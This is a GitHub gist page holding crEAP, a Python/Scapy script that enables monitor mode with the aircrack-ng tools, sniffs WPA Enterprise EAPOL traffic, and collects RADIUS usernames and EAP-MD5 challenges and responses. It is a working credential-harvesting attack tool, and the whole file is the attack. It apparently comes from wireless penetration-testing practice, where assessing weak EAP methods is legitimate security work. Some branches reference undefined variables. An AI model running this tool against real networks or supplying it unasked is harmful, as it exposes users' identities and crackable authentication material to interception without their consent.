Created
December 17, 2015 08:31
-
-
Save interference-security/9f89a653e99232dc3594 to your computer and use it in GitHub Desktop.
crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if #insecure protocols are in use, crEAP will harvest Radius usernames and handshakes. (https://github.com/Shellntel/scripts/blob/master/crEAP.py)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if | |
| #insecure protocols are in use, crEAP will harvest Radius usernames and handshakes. | |
| #Author: Snizz | |
| #Requirements: Should be run as root/sudo. | |
| # | |
| # Python Scapy Community (scapy-com) - Dev version of Scapy which supports additional | |
| # filters such as EAP types. Get @ https://bitbucket.org/secdev/scapy-com | |
| # | |
| # Airmon-ng, airodump-ng (Aircrack-ng Suite - http://www.aircrack-ng.org/) | |
| # | |
| # Screen for terminal managment/ease of launching airodump (requirement for | |
| # Promiscuous/Channel hopping to capture the EAPOL packets) | |
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| from collections import defaultdict | |
| from scapy.all import * | |
| import sys | |
| import thread | |
| import subprocess | |
| class bcolors: | |
| HEADER = '\033[95m' | |
| OKBLUE = '\033[94m' | |
| OKGREEN = '\033[92m' | |
| WARNING = '\033[93m' | |
| FAIL = '\033[91m' | |
| ENDC = '\033[0m' | |
| BOLD = '\033[1m' | |
| UNDERLINE = '\033[4m' | |
| version = "1.1" | |
| # Got root/sudo? | |
| euid = os.geteuid() | |
| if euid != 0: | |
| print bcolors.FAIL + "\n[-]"+ bcolors.ENDC + "Script not started as root. Running sudo..." | |
| args = ['sudo', sys.executable] + sys.argv + [os.environ] | |
| # the next line replaces the currently-running process with the sudo | |
| os.execlpe('sudo', *args) | |
| try: # Python Scapy-Com check (inspiration from EAPEAK/McIntyre) | |
| from scapy.layers.l2 import eap_types as EAP_TYPES | |
| except ImportError: | |
| print bcolors.FAIL + "\n[!]"+ bcolors.ENDC +" Scapy-Com not installed, needed for parsing EAPOL packets." | |
| print bcolors.WARNING + "[-]"+ bcolors.ENDC +" Download: hg clone https://bitbucket.org/secdev/scapy-com" | |
| print bcolors.WARNING + "[-]"+ bcolors.ENDC +" Remove: dpkg --ignore-depends=python-scapy -r python-scapy" | |
| print bcolors.WARNING + "[-]"+ bcolors.ENDC +" Install: python setup.py install" | |
| sys.exit(0) | |
| #Prereq checks: | |
| requirement = ['airmon-ng', 'airodump-ng', 'screen'] | |
| for r in requirement: | |
| devnull = open("/dev/null", "w") | |
| if r == 'screen': | |
| try: | |
| subprocess.call([r, "-v"], stdout=devnull) | |
| except OSError: | |
| print bcolors.FAIL + "\n[-]"+ bcolors.ENDC + r +" dependancy not detected, exiting." | |
| sys.exit(0) | |
| else: | |
| try: | |
| subprocess.call([r], stdout=devnull) | |
| except OSError: | |
| print bcolors.FAIL + "\n[-]"+ bcolors.ENDC + r +" dependancy not detected, exiting." | |
| sys.exit(0) | |
| banner = bcolors.OKGREEN + """ | |
| ___________ _____ __________ | |
| __________\_ _____/ / _ \\______ \ | |
| _/ ___\_ __ \ __)_ / /_\ \| ___/ | |
| \ \___| | \/ \/ | \ | | |
| \___ >__| /_______ /\____|__ /____| | |
| \/ \/ \/ | |
| crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if | |
| insecure protocols are in use, crEAP will harvest Radius usernames and handshakes. | |
| """ + bcolors.ENDC | |
| print "\n"+banner | |
| print "Version: "+bcolors.OKGREEN +version+bcolors.ENDC | |
| #Check to see if WLAN is in MONITOR mode, if not, set it | |
| md5challenge = {} | |
| requser = {} | |
| USER = {} | |
| USERID = {} | |
| USERNAME = {} | |
| UserList = [] | |
| checked = [] | |
| #bssids = set(['00:00:00:00:00', 'Null']) | |
| bssids = defaultdict(list) | |
| bssids.update({'mac':"00:00:00:00:00:00", 'net':'testing'}) | |
| #Interface Foo | |
| print "\n" + bcolors.WARNING + "[-]" + bcolors.ENDC + " Current Wireless Interfaces\n" + bcolors.ENDC | |
| print subprocess.Popen("iwconfig", shell=True, stdout=subprocess.PIPE).stdout.read() | |
| subprocess.Popen("screen -X -S crEAP kill", shell=True, stdout=subprocess.PIPE).stdout.read() | |
| try: | |
| adapter = raw_input(bcolors.WARNING + "Specify wireless interface: "+ bcolors.FAIL + "(This will enable MONITOR mode)"+ bcolors.ENDC + " (wlan0, wlan2, etc): ") | |
| except: | |
| print "\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Issue specifying the wireless interface, exiting.\n" | |
| sys.exit(0) | |
| try: | |
| print bcolors.WARNING + "\n[-]"+ bcolors.ENDC + " Enabling monitor interface and channel hopping..." | |
| subprocess.Popen("airmon-ng check kill", shell=True, stdout=subprocess.PIPE).stdout.read() | |
| subprocess.Popen("airmon-ng start "+adapter, shell=True, stdout=subprocess.PIPE).stdout.read() | |
| adapter=adapter+"mon" | |
| except: | |
| print "\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Unable to enable MONITOR mode, exiting.\n" | |
| try: | |
| subprocess.Popen(['screen -dmS crEAP'], shell=True, stdout=subprocess.PIPE).stdout.read() | |
| cmd = "stuff $" + "'sudo airodump-ng -c1 "+adapter+"\n'" | |
| subprocess.Popen(['screen -r crEAP -X ' + cmd], shell=True, stdout=subprocess.PIPE).stdout.read() | |
| except: | |
| print "\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Unable to set channel hopping and promiscuous mode, exiting.\n" | |
| def eapol_header(packet): | |
| global USERID | |
| global USER | |
| global USERNAME | |
| #packet.show() | |
| for pkt in packet: | |
| get_bssid(pkt) | |
| try: | |
| if pkt.haslayer(EAP): | |
| if pkt[EAP].type==1: #Identified an EAP authentication | |
| USERID=pkt[EAP].id | |
| if pkt[EAP].code == 2: | |
| USER=pkt[EAP].identity | |
| #EAP-MD5 - Credit to EAPMD5crack for logic assistance | |
| if pkt[EAP].type==4: #Found EAP-MD5 | |
| EAPID=pkt[EAP].id | |
| if pkt[EAP].code == 1: | |
| md5challenge[EAPID]=pkt[EAP].load[1:17] | |
| network = bssids[pkt.addr2] | |
| print "\n" + bcolors.OKGREEN + "[!]" + bcolors.ENDC +" EAP-MD5 Authentication Detected" | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" BSSID: " + (network) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" Auth ID: " + str(USERID) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" User ID: " + str(USER) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" MD5 Challenge: " + md5challenge[EAPID].encode("hex") | |
| addtolist(USER) | |
| elif packets[EAP].code == 2: | |
| md5response[EAPID]=packets[EAP].load[1:17] | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" MD5 Response: " + md5response[EAPID].encode("hex") | |
| #EAP-PEAP | |
| elif pkt[EAP].type==25: #Found EAP-PEAP | |
| EAPID=pkt[EAP].id | |
| if pkt[EAP].code == 2: | |
| network = bssids[pkt.addr1] #reverse as it is the destination mac (Client->Server Identify) | |
| print "\n" + bcolors.OKGREEN + "[!]" + bcolors.ENDC +" EAP-PEAP Authentication Detected" | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" BSSID: " + (network) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" Auth ID: " + str(USERID) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" User ID: " + str(USER) | |
| addtolist(USER) | |
| #EAP-TLS | |
| elif pkt[EAP].type==13: #Found EAP-TLS | |
| EAPID=pkt[EAP].id | |
| if pkt[EAP].code == 2: | |
| network = bssids[pkt.addr2] | |
| print "\n" + bcolors.OKGREEN + "[!]" + bcolors.ENDC +" EAP-TLS Authentication Detected" | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" BSSID: " + (network) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" Auth ID: " + str(USERID) | |
| print bcolors.OKGREEN + "[-]" + bcolors.ENDC +" User ID: " + str(USER) | |
| addtolist(USER) | |
| except: | |
| print "\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Python Scapy not able to extract EAPOL data, make sure scapy-com is installed which supports EAP types. (https://bitbucket.org/secdev/scapy-com)\n" | |
| sys.exit(0) | |
| def get_bssid(pkt): | |
| global bssids | |
| if pkt.haslayer(Dot11): | |
| if pkt.type==0 and pkt.subtype==8: | |
| for item in bssids.values(): | |
| if pkt.info in item: | |
| break | |
| elif pkt.addr2 in item: | |
| break | |
| else: | |
| bssids.update({pkt.addr2:pkt.info}) | |
| def addtolist(USER): | |
| #if USERNAME not in UserList: | |
| UserList.append(USER) | |
| global checked | |
| checked = [] | |
| for item in UserList: | |
| if item not in checked: | |
| checked.append(item) | |
| #Main and EAPOL-HEADER | |
| try: | |
| print bcolors.WARNING + "\n[-]"+ bcolors.ENDC + " Sniffing for EAPOL packets on interface", adapter,"... "+ bcolors.FAIL + "Ctrl+C to exit" + bcolors.ENDC | |
| conf.iface = adapter | |
| sniff(iface=adapter, prn=eapol_header) | |
| except: | |
| "\n" + bcolors.FAIL + "\n[!]" + bcolors.ENDC + " Issue sniffing packets, ensure python's scapy-com in installed (https://bitbucket.org/secdev/scapy-com).\n" | |
| sys.exit(0) | |
| print "\n" + bcolors.FAIL + "\n[!]" + bcolors.ENDC + " User requested interrupt, cleaning up monitor interface and exiting...\n" | |
| print bcolors.WARNING + "[-]"+ bcolors.ENDC + " Cleaning up interfaces...\n" | |
| subprocess.Popen("screen -X -S crEAP kill", shell=True, stdout=subprocess.PIPE).stdout.read() | |
| subprocess.Popen("sudo airmon-ng stop "+adapter, shell=True, stdout=subprocess.PIPE).stdout.read() | |
| print bcolors.OKGREEN + "[-]"+ bcolors.ENDC + " Unique Harvested Users:" | |
| print checked | |
| print "\n" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment